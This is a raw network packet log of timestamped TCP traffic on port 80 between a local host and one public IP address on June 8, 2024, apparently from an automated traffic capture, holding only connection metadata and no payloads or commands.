Jun 8, 2024 20:22:06.085453987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085460901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085491896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085513115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085526943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085537910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085563898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085577965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085617065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086169004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086204052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086229086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086239100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086249113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086275101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086287975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086327076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086328030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086364031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086378098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086399078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086416960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086432934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086453915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086467028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.086479902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.086517096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087168932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087203979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087229967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087238073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087249041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087274075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087285995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087321997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087327957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087363005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087377071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087398052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087412119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087433100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087449074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087466955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.087482929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.087519884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088215113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088249922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088278055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088285923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088299990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088321924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088336945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088356018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088366985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088391066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088402033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088426113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088443995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088460922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088478088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088512897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088517904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088543892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088563919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088577986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088587046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088628054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088891983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088907957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088922024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088937998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088953972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088964939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088964939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088964939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088970900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088989019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.088996887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.088996887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089005947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089021921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089027882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089027882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089068890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089068890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089704990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089721918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089735985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089751959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089768887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089768887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089768887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089786053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089796066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089796066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089802980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089819908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089819908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089819908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089837074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.089838982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089857101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.089890957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090636969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090653896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090667963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090683937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090697050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090697050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090701103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090718985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090724945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090724945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090734959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090745926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090751886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090770006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.090771914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090771914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090791941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.090807915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091475964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091494083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091509104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091527939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091531038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091543913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091555119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091562033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091574907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091579914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091598034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091602087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091602087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091614962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091622114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091634035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.091641903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091660976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.091696024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092422962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092470884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092554092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092569113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092585087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092600107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092607975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092607975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092616081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092634916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092634916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092653990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092696905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092713118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092727900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092741013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092751026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092751026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092758894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092777967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.092777967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092777967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092797041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.092814922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093060970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093079090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093115091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093115091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093221903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093238115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093255043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093276978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093276978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093310118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093533039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093549013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093564034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093580008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093583107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093596935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093610048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093610048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093614101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093630075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093632936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.093651056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093651056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.093674898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094002962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094017982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094033003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094049931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094052076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094052076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094065905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094084978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094084978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094103098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094166040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094183922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094198942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094213963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094229937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094247103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094264030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094270945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094270945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094270945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094270945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094316006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094316006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.094955921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094973087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.094990969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095012903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095012903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095046997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095093012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095110893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095125914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095143080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095144987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095144987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095159054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095165014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095175982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095185041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095194101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095206022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095211983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095228910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.095232964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095232964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095252037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.095272064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096210003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096226931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096240044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096256018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096265078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096265078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096273899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096291065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096292019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096291065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096311092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096313000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096327066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096332073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096343994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096352100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096360922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096371889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096379042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096391916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096396923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096412897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096416950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096416950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096436977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096456051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096909046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096926928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096940041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096956015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096961021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096961021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096973896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.096982002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.096990108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097002029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097007036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097023964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097027063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097027063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097047091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097049952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097067118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097068071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097085953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097100973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097111940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097112894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097117901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097132921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097135067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097157955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097157955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097177982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.097944021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097970009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.097984076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098000050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098006964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098006964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098015070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098031998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098035097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098035097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098047972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098054886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098064899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098081112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098084927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098097086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098110914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098110914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098114967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098129988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098131895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098150015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098155975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098155975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098175049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098192930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098701000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098723888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098745108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098762035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098762035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098794937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098835945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098858118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098875999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098880053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098897934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098900080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098918915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098921061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098943949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.098944902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098964930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098967075 CEST	80	49731	23.88.106.134	192.168.2.4
